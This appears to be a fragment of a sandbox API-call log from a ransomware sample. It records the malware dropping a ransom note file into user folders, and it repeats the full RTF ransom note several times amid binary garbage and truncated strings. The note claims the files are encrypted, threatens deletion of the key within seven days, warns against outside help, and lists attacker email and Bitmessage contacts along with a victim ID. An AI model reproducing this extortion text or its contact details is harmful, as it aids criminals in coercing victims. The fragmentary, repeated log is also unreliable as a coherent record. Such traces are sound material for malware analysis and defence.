INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9f\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0278.185] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.186] CloseHandle (hObject=0x294) returned 1 [0278.186] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\#readme_eman#.rtf")) returned 0xffffffff [0278.186] GetLastError () returned 0x2 [0278.186] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.187] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.187] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.187] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES 